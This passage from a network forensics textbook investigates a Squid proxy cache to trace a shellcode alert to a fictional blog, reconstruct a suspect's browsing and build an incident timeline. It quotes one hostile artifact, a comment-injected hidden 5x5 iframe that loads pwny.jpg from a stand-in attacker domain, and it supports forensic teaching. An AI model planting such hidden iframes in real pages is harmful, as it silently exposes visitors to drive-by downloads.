Based on the “Content-Type” HTTP header, it appears that the content of this Squid cache file is “text/html.” Let’s cut off the Squid metadata and HTTP headers in order to isolate the page content. Figure 10-19 is a screenshot of the Squid cache file 00000589 opened in the Bless hex editor, as we cut off the highlighted bytes. We will save this file as “00000589-edited.html.”

image

Figure 10-19 A screenshot of the Squid cache file 00000589 opened in the Bless hex editor, as we cut off the highlighted bytes.

Now let’s find the reference to “http://www.evil.evl/pwny.jpg.” Scrolling through the content of 00000589-edited.html, we see the following text [formatting modified to fit the page]:

<h3 id="comments">1 Comment</h3>
  <ol class="commentlist">
    <li class="alt1" id="comment-3">
       <div class="commentcount">
       <a href="#comment-3" title="">1</a>
       </div>
       <strong>loser</strong> // April 29th, 2011 at 2:28 am
                                     <br />
       <div class="commenttext">
       <p>luv the site! <img src='http://sketchy.evl/wp-includes/images/
           smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  hope u get
           lots of traffic lol<iframe src="http://www.evil.evl/pwny.jpg" width
           ="5px" height="5px" frameborder="0"></iframe></p>
       </div>
     </li>
  </ol>
 </ol >
<h3 id="respond">Leave a Comment</h3>
<form action="http://sketchy.evl/wp-comments-post.php" method="post" id="
    commentform">

As shown above, the reference to pwny.jpg is contained within a 5px by 5px iFrame within a comment of this page. It is barely visible and automatically loads when the page is visited. The user probably never even knew it existed. Most likely, the user who posted the comment (“loser”) took advantage of a persistent cross-site scripting vulnerability in the site and included this code in a public comment.

To view the page, we use a copy of Firefox running in a sandbox, with the “Work Offline” option checked. Using this, we can open the web page that we carved out of cache file 00000589, as shown in Figure 10-20. Because the file is opened in isolation, without network access, the images and style sheets that would normally format this page are missing. Instead, we simply see the content of this one file rendered alone. In the rendered web page, you can see the comment by “l0ser,” which contained a nearly invisible 5×5 pixel iFrame with a link to pwny.jpg.

image

Figure 10-20 A version of Firefox running in an isolated sandbox, used to open the web page carved out of cache file 00000589. This is the cached page http://sketchy.evl/?p=3. Because this file is opened in isolation, without network access, the images and style sheets that would normally format this page are missing. In the rendered web page, you can see the comment by “l0ser,” which contained a nearly invisible 5×5 pixel iFrame with a link to pwny.jpg.

Judging by the details on the web page, the comment appears to have been posted by a user called “l0ser” on “April 29, 2011 at 2:28AM.” Of course, we have no way of verifying the accuracy of this date and time (we don’t even know what time zone the remote server is located in), but we may find evidence from more reliable systems that corroborates this information.

10.8.3 Squid Access.log File

Let’s turn our attention to Squid’s access.log file, which contains a history of requests and corresponding clients. First, let’s get some general statistics about this access.log file. Figure 10-21 shows the summary page from SARG. From this summary, we can see that this access.log file is fairly small. There are two active clients, 192.168.1.170 and 192.168.1.169, which together transferred a total of 21.21M.

image

Figure 10-21 The summary page from SARG.
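
For reference, a report like the one shown in Figure 10-21 can typically be generated by pointing SARG at the access log and an output directory; this is a sketch assuming a default SARG installation, with “sarg-report” as an arbitrary output directory:

$ sarg -l access.log -o sarg-report   # "sarg-report" is an arbitrary output directory

Returning to the raw log, we can examine the first and last entries directly: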

$ head -1 access.log
1305729798.958    409 192.168.1.170 TCP_MISS/200 799 HEAD http://start.ubuntu
    .com/8.04/ - DIRECT/91.189.90.41 text/html
$ tail -1 access.log
1305731725.796    143 192.168.1.169 TCP_MISS/302 562 GET http://www.gravatar.
    com/avatar.php? - DIRECT/72.233.44.61 text/html

The first entry in the access.log file occurred at 1305729798.958 (UNIX time, the number of seconds since January 1, 1970 UTC). We can convert this to human-readable time using the “date” command as follows:

$ date --utc -d @1305729798.958
Wed May 18 14:43:18 UTC 2011

From this we see that the first entry in the access.log file occurred on Wed May 18 14:43:18 UTC 2011. Similarly, we can see that the last entry occurred at 1305731725.796, which translates into “Wed May 18 15:15:25 UTC 2011,” as shown below:

$ date --utc -d @1305731725.796
Wed May 18 15:15:25 UTC 2011

It appears that the browsing in the access.log file occurred on Wednesday, May 18, 2011, beginning at 14:43:18 UTC and ending at 15:15:25 UTC. This means that the logs span a time period of just over half an hour.

Now, let’s extract only the web browsing history relating to our client of interest, 192.168.1.169. As you can see below, the resulting file of web surfing activity from 192.168.1.169 contains 1,487 entries.

$ grep '192.168.1.169' access.log > access-192.168.1.169.log

$ wc -l access-192.168.1.169.log
1487 access-192.168.1.169.log

Now, let’s check the beginning and ending timestamps for the browsing history associated with 192.168.1.169:

$ head -1 access-192.168.1.169.log
1305729883.014    144 192.168.1.169 TCP_MISS/302 737 GET http://www.microsoft
    .com/isapi/redir.dll? - DIRECT/65.55.21.250 text/html

$ tail -1 access-192.168.1.169.log
1305731725.796    143 192.168.1.169 TCP_MISS/302 562 GET http://www.gravatar.
    com/avatar.php? - DIRECT/72.233.44.61 text/html

The timestamp on the first entry is “1305729883.014.” Converting this to human-readable format, we see that this is equivalent to “Wed May 18 14:44:43 UTC 2011.” Similarly, the timestamp for the last entry is “1305731725.796,” or “Wed May 18 15:15:25 UTC 2011.”

Notice also that the first URI requested by 192.168.1.169 was:

http://www.microsoft.com/isapi/redir.dll?

The destination of this URI, microsoft.com, lends support to the theory that 192.168.1.169 is running Microsoft software, such as Internet Explorer and Windows.

We know that the URI of the cached web object that triggered the original Snort alert was “http://www.evil.evl/pwny.jpg.” Let’s use this URI as a key to look up the corresponding entry in access.log:

$ grep 'http://www.evil.evl/pwny.jpg' access-192.168.1.169.log
1305730905.602     45 192.168.1.169 TCP_MISS/200 1087 GET http://www.evil.evl
    /pwny.jpg - DIRECT/172.16.16.218 image/jpeg

From this, we can see that the JPEG was requested at 1305730905.602, or Wed May 18 15:01:45 UTC 2011.

Let’s take a peek at the browsing history originating from 192.168.1.169. Scrolling through the file access-192.168.1.169.log, here are some of the more interesting URIs, organized by category:

Resigning and looking for a new job

http://jobsearch.about.com/cs/careerresources/a/resign.htm
http://jobsearch.about.com/od/resignationletters/a/resignemail.htm
http://jobsearch.about.com/cs/cooljobs/a/dreamjob.htm
http://0.tqn.com/d/jobsearch/1/G/T/L/iquit.jpg
http://monster.com/

Money

http://www.walletpop.com/photos/25-ways-to-make-quick-money/
http://sketchy.evl/wp-content/themes/GreenMoney/images/money.jpg
http://www.wired.com/threatlevel/2011/05/carders/

Travel

http://www.expatexchange.com/vietnam/liveinvietnam.html
http://wiki.answers.com/Q/What_countries_have_non-extradition

Data destruction

http://www.zdnet.com/blog/storage/how-to-really-erase-a-hard-drive/129

How did we know that the page “http://www.wired.com/threatlevel/2011/05/carders/” was related to money? There is another URI in the browsing history, shown below:

http://bcp.crwdcntrl.net/4/ct=y|ref=http%253A%252F%252Fwww.wired.com%252
    Fthreatlevel%252F2011%252F05%252Fcarders%252F|c=312|rand=164776000|pv=y|
    med=%23OpR%2310543%23Blog%20Entry%3A%20threatlevel%20%3A%20%20%3A%20|int=
    Chat%20Log%3A%20What%20It%20Looks%20Like%20When%20Hackers%20Sell%20Your%20
    Credit%20Card%20Online|int=sony|async=undefined|rt=ifr

This URI is designed to track the user’s web browsing activity. When embedded in a web page, this URI causes the client’s browser to send a request to the third party at “http://bcp.crwdcntrl.net.” According to Abine, “the online privacy company,” “crwdcntrl.net is a domain used by Lotame which is an advertising company that is part of a network of sites, cookies, and other technologies used to track you....”40

40. “Abine,” 2011, http://www.abine.com/trackers/crwdcntrl.net.php.

Notice that a site that the user visited, “http://www.wired.com/threatlevel/2011/05/carders/,” was included as part of the request to crwdcntrl.net (it was URL-encoded twice before insertion). The article’s title, “Chat Log: What It Looks Like When Hackers Sell Your Credit Card Online,” was also included in the tracking URI. Handy! We would not have recovered that information from the original URI request record in access.log.
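
To recover the embedded URL from a tracking parameter like this, the value simply needs to be URL-decoded twice. Here is a quick sketch, assuming the Perl URI::Escape module is installed (as it is on most systems with the libwww Perl libraries):

$ echo 'http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F05%252Fcarders%252F' |
    perl -MURI::Escape -ne 'print uri_unescape(uri_unescape($_))'   # decode twice
http://www.wired.com/threatlevel/2011/05/carders/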

Third-party tracking of web surfing activities has become ubiquitous and very detailed. In addition to sending detailed information to third-party advertisers, trackers can leave extra information in web proxy logs, as well. Forensic investigators can take advantage of these extra “Easter eggs” and gather supplemental data from them for use in an investigation.

10.8.4 Further Squid Cache Analysis

Up to this point, we have found two domains that are directly linked to the event that triggered the original Snort NIDS alert, “SHELLCODE x86 NOOP”:

evil.evl—The domain that hosted pwny.jpg, the image that triggered the original Snort alert, “SHELLCODE x86 NOOP.”

sketchy.evl—The domain which contained a link to http://www.evil.evl/pwny.jpg.

Let’s search the Squid cache to see if we can find any other pages that are related to these domains, and use squid_extract_v01.pl to automatically extract the contents.

$ for cache_file in `grep -Elir 'sketchy\.evl|evil\.evl' squid`; do
    squid_extract_v01.pl -f $cache_file -o squid-extract-evl/; done

$ ls squid-extract-evl/
extract_log.txt  sketchy.evl  www.evil.evl  www.hyperpromote.com

It appears that the cache contains pages from three domains that contain references to sketchy.evl or evil.evl. Here is selected output from extract_log.txt:

Extracting http://sketchy.evl/?p=3
Extracting http://www.evil.evl/pwny.jpg
Extracting http://sketchy.evl/wp-includes/images/smilies/icon_wink.gif
Extracting http://sketchy.evl/wp-login.php
Extracting http://sketchy.evl/wp-admin/wp-admin.css?version=2.3.3
Extracting http://sketchy.evl/wp-admin/images/login-bkg-tile.gif
Extracting http://sketchy.evl/wp-admin/images/fade-butt.png
Extracting http://sketchy.evl/wp-admin/images/login-bkg-bottom.gif
Extracting http://sketchy.evl/wp-admin/profile.php
Extracting http://sketchy.evl/wp-includes/js/fat.js?ver=1.0-RC1_3660
Extracting http://sketchy.evl/wp-admin/images/browse-happy.gif
Extracting http://sketchy.evl/wp-admin/images/heading-bg.gif
Extracting http://sketchy.evl/wp-admin/images/logo-ghost.png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/feed-icon
   -12x12.png
Extracting http://sketchy.evl/
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/style.css
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/bg.png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/logo-sketch
   .png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/money.jpg
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/rss.gif
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/advertise.
   gif
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/arrow.gif
Extracting http://sketchy.evl/?page_id=2
Extracting http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&
   bvlocationcode=272892&bvurl=http://sketchy.evl/?page_id=2&bvtitle=About
   %20%3A%20sKetchy%20Kredit
Extracting http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&
   bvlocationcode=272892&bvurl=http://sketchy.evl/?page_id=2&bvtitle=About
   %20%3A%20sKetchy%20Kredit
Extracting http://sketchy.evl/?page_id=4
Extracting http://sketchy.evl/?page_id=4#comment-7

From the output of extract_log.txt, we can see that the overwhelming majority of extracted pages are from the sketchy.evl domain. The sketchy.evl server appears to be hosting a Wordpress web site, which we can tell by the presence of default Wordpress files and directories such as “wp-login.php” and “wp-content.”

There appears to be only one object from the evil.evl domain (the download of pwny.jpg), and there are two objects from “hyperpromote.com,” which judging by the name and URI are likely related to advertising and activity tracking.

Let’s examine a few pages that seem interesting. Figure 10-22 shows the page: http://sketchy.evl/?page_id=2

image

Figure 10-22 The page http://sketchy.evl/?page_id=2, extracted from the Squid cache and viewed offline in a web browser.

From the “About” tag and the page content, it appears that this page is designed to provide information about an organization called “sKetchy Kredit,” which is “your #1 source for all credit card recycling needs.” Apparently they are based in a “sunny, overseas location.” Interestingly, the page indicates that a user called “N. Phil Trader” was logged in when the page was cached.

What time was the page “http://sketchy.evl/?page_id=2” retrieved? The answer is not obvious because the variable “page_id=2” that differentiates this page from others is not included in access.log or store.log. However, we can extract the hash used to index files in the cache from the corresponding cache file (000005B9), and then match this hash to a line in store.log.

Figure 10-23 shows the cache file (000005B9) from which squid_extract_v01.pl carved out “http://sketchy.evl/?page_id=2.” Notice the URI in the ASCII text in the right-hand column. You can also see the “Date” listed in the HTTP headers sent by the server: Wed, 18 May 2011 15:03:36 GMT. Finally, we have highlighted the hash value in the Squid metadata, 88D70371DB405AC6D7FA291B36E6B594.

image

Figure 10-23 The cache file (000005B9) from which squid_extract_v01.pl carved out “http://sketchy.evl/?page_id=2.” We have highlighted the hash value in the Squid metadata, 88D70371DB405AC6D7FA291B36E6B594.

Next, we can use the hash to extract the corresponding value from store.log:

$ grep 88D70371DB405AC6D7FA291B36E6B594 store.log
1305731016.113 SWAPOUT 00 000005B9 88D70371DB405AC6D7FA291B36E6B594  200
    1305731016 1305731016 1305731016 text/html -1/8185 GET http://sketchy.evl
    /?

From this, we can see that the page was cached at 1305731016.113, which translates to “Wed May 18 15:03:36 UTC 2011.” This value, set by the internal web proxy www-proxy.example.com, corresponds precisely with the time in the HTTP headers set by the suspicious remote server—a good sign that the time on the remote server was accurate when this page was cached.

Figure 10-24 shows the contents of http://sketchy.evl/?page_id=4, carved from the Squid cache and displayed offline in a web browser. This page urges the reader to “send us your database” of credit card numbers in exchange for payment. It appears that the same user, “N. Phil Trader,” was logged in when this page was cached, and has even posted a comment that is awaiting moderation (in other words, if we simply visited the web site from a different system, we would not see this comment unless the administrator had chosen to approve it!).

image

Figure 10-24 The page http://sketchy.evl/?page_id=4, extracted from the Squid cache and viewed offline in a web browser.

Based on the values in the page, the comment appears to have been posted on May 18, 2011, at 10:05 AM (of course, we do not know the time zone and cannot rely on the suspicious remote web server for accuracy). The content implies that “phil” has access to credit card data and is interested in finding out how much it is worth.

Once again, we can use the hash value from the cache file (squid/00/05/000005BE) to look up the corresponding entry in store.log, as shown below:

$ grep 062208B432C7EB85E1C96BF25EA0ED04 store.log
1305731045.257 SWAPOUT 00 000005BE 062208B432C7EB85E1C96BF25EA0ED04  200
    1305731045 1305731045 1305731045 text/html -1/8500 GET http://sketchy.evl
    /?

From this, we see that the page http://sketchy.evl/?page_id=4 was cached at 1305731045.257, which corresponds with Wed May 18 15:04:05 UTC 2011.

Who is this “N. Phil Trader”? Browsing through the extracted Squid cache pages, we come across Wordpress’ “profile.php” page. What luck! This Wordpress page normally contains information about users.

In the access.log file, we see a corresponding entry for “http://sketchy.evl/wp-admin/profile.php,” as shown below:

1305730955.740    200 192.168.1.169 TCP_MISS/200 5612 GET http://sketchy.evl/
    wp-admin/profile.php - DIRECT/172.16.16.217 text/html

The access time, 1305730955.740, translates to “Wed May 18 15:02:35 UTC 2011.” Opening the extracted cache contents in an offline web browser, as shown in Figure 10-25, we see details about this user’s account! The email address “[email protected]” indicates that the user has an email account at MacDaddy Payment Processor (since the local domain is example.com). Presumably, local staff will be able to identify this user.

image

Figure 10-25 The page http://sketchy.evl/wp-admin/profile.php, extracted from the Squid cache and viewed offline in a web browser.

10.8.5 Timeline

Based on the evidence we have recovered, let’s put together a timeline of events. As always, this timeline is just a hypothesis based on our analysis up to this point.

This timeline is for events that occurred on May 18, 2011. Note that we have included information gleaned from our earlier Snort analysis as well (see Chapter 7 for details). The times listed below are in UTC:

14:43:18—First entry in the Squid access.log file from www-proxy.example.com.

14:44:43—First entry relating to 192.168.1.169 in the Squid access.log file from www-proxy.example.com.

14:45:09—NIDS alerts for 192.168.1.169 begin (from the alert file). Though these initial alerts—for web bug downloads—do not themselves indicate any particularly adverse behavior, they do serve to establish a known commencement of web browsing activity by 192.168.1.169.

15:01:45—NIDS alert for possible shellcode being downloaded by 192.168.1.169 from an unknown external web server (from the alert file). This is the NIDS alert that was the impetus for our investigation.

15:01:45—The user of 192.168.1.169 downloaded http://www.evil.evl/pwny.jpg.

15:02:35—The user of 192.168.1.169 visited http://sketchy.evl/wp-admin/profile.php.

15:03:36—The user of 192.168.1.169 visited http://sketchy.evl/?page_id=2.

15:04:05—The user of 192.168.1.169 visited http://sketchy.evl/?page_id=4.

15:04:28–15:04:38—Multiple NIDS alerts (18) report crafted packets from 192.168.1.169 to multiple internal hosts (from the alert file).

15:15:08—NIDS alerts for 192.168.1.169 end (from the alert file). The end of the web bug download alerts does not definitively indicate that 192.168.1.169 has ceased to be active on the network, but it does at least indicate a possible change in the operator’s web browsing activities.

15:15:25—Last entry in the Squid access.log file from www-proxy.example.com. Also the last entry that relates to 192.168.1.169.

10.8.6 Theory of the Case

Now let’s summarize our theory of the case. This is just a working hypothesis, supported by the evidence, outside references, and our experience:

• From at least 14:44:43 until at least 15:15:25 on 5/18/11, internal host 192.168.1.169 was used to browse external web sites, some of which delivered web bugs that were detected and logged.

• The user of 192.168.1.169 visited sites that were related to the following topics:

– Resigning and looking for a new job

– Money

– Travel (specifically to nonextradition countries)

– Data destruction

Taken together, this activity suggests that the user of 192.168.1.169 may not be happy with his job at MacDaddy Payment Processor and may be looking for other ways to make money (including some that are illegal).

• The user of 192.168.1.169 visited http://sketchy.evl (172.16.16.217:80). This site appeared to be engaged in credit card number theft, encouraging readers to send in their companies’ credit card databases in exchange for money.

• A page on http://sketchy.evl contained a comment posted by someone calling themselves “l0ser.” This comment contained a nearly invisible 5×5 pixel iFrame with a link to pwny.jpg. When the web browser on 192.168.1.169 loaded the page with the comment, it automatically downloaded the suspicious file, pwny.jpg. The user of 192.168.1.169 probably had no idea that pwny.jpg was downloaded.

• We were able to carve the same suspicious jpg (pwny.jpg) out of both the Snort packet capture and the Squid web proxy cache. The MD5sum of the suspicious JPEG was: 13c303f746a0e8826b749fce56a5c126

• The web site sketchy.evl had a user account with the name and email address of a local employee, N. Phil Trader ([email protected]). This user attempted to post a comment indicating that he had access to credit card data, and he wanted to know how much it was worth. If N. Phil Trader is also the user of 192.168.1.169, this comment would fit with the web surfing activity profile we have already seen relating to 192.168.1.169.

• At 15:04:28, internal host 192.168.1.169 spent roughly 10 seconds sending crafted packets to other internal hosts on the 192.168.1.0/24 network. Based on their nonstandard nature, the packets are consistent with those used to conduct reconnaissance via scanning and operating system fingerprinting. This activity may have been deliberately conducted by the user of 192.168.1.169; it is also possible that the client was compromised by a remote system and used as a pivot point for further attacks from the outside. Given the user’s web surfing history, the client may have been compromised through a web browser vulnerability. The suspicious file pwny.jpg could have been part of an exploit.

10.8.7 Response to Challenge Questions

Examine the Squid cache and extract any cached pages/files associated with the Snort alert shown above. The Snort alert was triggered by the following image: http://www.evil.evl/pwny.jpg

We analyzed the Squid cache and found that this image was included in an iFrame in the following page: http://sketchy.evl/?p=3

We extracted both of these web objects from the Squid cache, and then used squid_extract_v01.pl within a Bash “for” loop to automatically extract all web objects that related to either sketchy.evl or evil.evl.

Determine whether the evidence extracted from the Squid cache corroborates our findings from the Snort logs. Yes, the evidence from the Squid cache correlates very well with the evidence we found in the Snort packet capture. For example, we were able to carve “pwny.jpg” from both the Snort packet capture and the Squid web cache, and it had the same cryptographic checksums both times.

In addition, the times of important events logged in both Snort and Squid match up. For example, in the Snort logs, we saw a NIDS alert for “SHELLCODE x86 NOOP” at 15:01:45 UTC, which we later discovered was triggered by the image pwny.jpg. In the Squid cache, we found that the URI http://www.evil.evl/pwny.jpg was requested at the same time, 15:01:45 UTC.

Based on web proxy access logs, gather information about the client system 192.168.1.169, including its likely operating system and the apparent interests of any users. Based on the contents of access.log, the client 192.168.1.169 is probably a Microsoft Windows system. The user’s web surfing activity indicates interest in:

– Resigning and looking for a new job

– Money

– Travel (specifically to nonextradition countries)

– Data destruction

Present any information you can find regarding the identity of any internal users who have been engaged in suspicious activities.

From the user profile on http://sketchy.evl, we have gathered the following identifying information:

– Username: philt

– First name: N. Phil

– Last name: Trader

– Nick name: philt

– Display name: N. Phil Trader

– Email address: [email protected]

This user also attempted to leave a comment on the web site http://sketchy.evl, which was as follows:

how much r u offering per card right now?

plz let me know. i have a bunch. thx, phil

10.8.8 Next Steps

Now that we’ve analyzed both the Snort NIDS server and the local Squid web proxy, what are some appropriate next steps?

Central Log Server We have a record of activities relating to the client 192.168.1.169, but who was logged into the system at the time? The central logging server may have authentication logs from local workstations that shed light on the account used at the time under investigation.

We also have indications that an insider may be preparing to disclose records from the company’s credit card database. The central logging server may include database application logs and server logs that could allow investigators to determine when and how the credit card information was accessed, and by whom.

The central logging server may also be useful for tracking down the client itself, 192.168.1.169. If this is a DHCP address, DHCP server logs would hopefully include mappings between this IP address and a network card address. Network equipment logs may indicate which port the network card was plugged into.

Video Surveillance/Physical Access Logs It’s all well and good to have authentication logs that indicate that a specific account was in use on 192.168.1.169, but how can we be sure that the account credentials were not stolen? Whenever possible, it is a good idea to corroborate with local video surveillance and physical access logs. These can help investigators determine who was actually sitting at the console at the time under investigation.

Hard Drive Analysis Once the client 192.168.1.169 has been acquired, hard drive analysis would be useful for determining precisely what happened. Why did 192.168.1.169 begin conducting reconnaissance on the local network? Did the local user deliberately install an application such as nmap? Is the system infected with malware? Was the client exploited through a browser vulnerability and then used as a pivot point by an external attacker? Hard drive analysis may not reveal anything more than network forensics has already unearthed, or it may reveal additional findings. At a minimum, we are likely to find evidence corroborating our findings so far, which strengthens our case.

Malware Analysis We can provide samples of the suspicious files we have uncovered to professional malware analysts. This can help us create NIDS and/or antivirus signatures for identifying the malware elsewhere on our network, determine the purpose and function of the malware, and scope the extent of the potential breach.

Human Resources Since an internal employee, N. Phil Trader ([email protected]), has been implicated in suspicious activities, it would normally be appropriate to notify human resources staff and work with them as the investigation progresses. Typically, human resources can provide guidance for monitoring efforts, broker interviews with the employee under investigation, and manage suspension or termination events should they be necessary. Consultation with legal counsel may also be appropriate. Professional human resources staff can help to manage the human element of the investigation, minimizing the risk that a truly malicious insider will cause further damage and helping to ensure that all employees are treated fairly.
